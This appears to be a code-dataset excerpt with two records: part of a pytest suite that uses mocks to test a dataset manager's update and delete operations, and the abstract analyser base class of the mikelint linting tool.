ds = create_ds(ds_id=ds_id, ds_config=ds_config)
with patch('sm.engine.dataset_manager.MolecularDB') as MolecularDB:
mol_db_mock = MolecularDB.return_value
mol_db_mock.name = 'HMDB'
with patch('sm.engine.dataset_manager.MolDBServiceWrapper') as MolDBServiceWrapper:
moldb_service_wrapper_mock = MolDBServiceWrapper.return_value
moldb_service_wrapper_mock.find_db_by_id.return_value = {'name': 'HMDB-v4'}
ds_man.update(ds)
es_mock.delete_ds.assert_called_with(ds_id)
call_args = es_mock.index_ds.call_args[1].values()
assert ds_id in call_args and mol_db_mock in call_args
def test_delete_ds(self, fill_db, sm_config, ds_config):
db = DB(sm_config['db'])
action_queue_mock = MagicMock(spec=QueuePublisher)
es_mock = MagicMock(spec=ESExporter)
img_store_service_mock = MagicMock(spec=ImageStoreServiceWrapper)
ds_man = create_ds_man(sm_config, db=db, es=es_mock, img_store=img_store_service_mock,
action_queue=action_queue_mock, sm_api=False)
ds_id = '2000-01-01'
ds = create_ds(ds_id=ds_id, ds_config=ds_config)
ds_man.delete(ds)
ids = ['iso_image_{}_id'.format(id) for id in range(1, 3)]
img_store_service_mock.delete_image_by_id.assert_has_calls(
[call('fs', 'iso_image', ids[0]), call('fs', 'iso_image', ids[1])])
es_mock.delete_ds.assert_called_with(ds_id)
assert db.select_one('SELECT * FROM dataset WHERE id = %s', params=(ds_id,)) == []
| 1.46875 | 1 |
mikelint/analysers/analyser.py | mike-fam/mikelint | 2 | 38276 | """
Abstract analyser
"""
from functools import wraps
from inspect import getmembers, ismethod
from typing import Callable
from ..type_hints import AnalyserResults, AnalyserHelper
from ..utils import SyntaxTree, BaseViolation, ViolationResult
def register_check(error_format: str):
"""
Registers a new checker to an analyser
Args:
error_format: error format of violation
"""
def decorator(check_method: Callable):
@wraps(check_method)
def wrapper(*args, **kwargs):
analyser = args[0]
checker_name = check_method.__name__
analyser.register_checker(checker_name,
check_method.__doc__,
error_format)
result: list[ViolationResult] = check_method(*args, **kwargs)
analyser.add_violations(checker_name, result)
return wrapper
return decorator
class Analyser:
"""Abstract base analyser"""
def __init__(self, sources: dict[str, AnalyserHelper]):
"""
Constructor
Args:
            sources: mapping of file name to its syntax tree and source lines
"""
self._check_results: AnalyserResults = {}
self._sources = sources
def register_checker(self, name: str, description: str, error_format: str):
"""
Registers a new checker to this analyser
Args:
name: name of the checker, typically the method name
description: description of this checker
error_format: format string used to display violations
"""
self._check_results[name] = BaseViolation(description, error_format, [])
def get_results(self) -> AnalyserResults:
"""
Returns results of all checkers of this analyser
"""
return self._check_results
def add_violations(self, checker_name: str,
results: list[ViolationResult]) -> None:
"""
Adds violation results to a checker
Args:
checker_name: name of the checker
results: list of violation results
"""
self._check_results[checker_name].values.extend(results)
def get_line(self, file_name: str, line_number: int) -> str:
"""Returns line given line number"""
return self._sources[file_name].source[line_number - 1].strip()
def run(self):
"""
Runs all checkers
"""
for method_name, method in getmembers(self, predicate=ismethod):
if not method_name.startswith("check_"):
continue
method()
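# Usage sketch (analyser and checker are hypothetical; sources is the
# file-name-to-AnalyserHelper mapping the constructor expects):
# class NamingAnalyser(Analyser):
#     @register_check("Line {}: `{}` is not snake_case")
#     def check_snake_case(self):
#         """Checks that names use snake_case"""
#         return []  # list of ViolationResult entries
# NamingAnalyser(sources).run()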
| 2.5625 | 3 |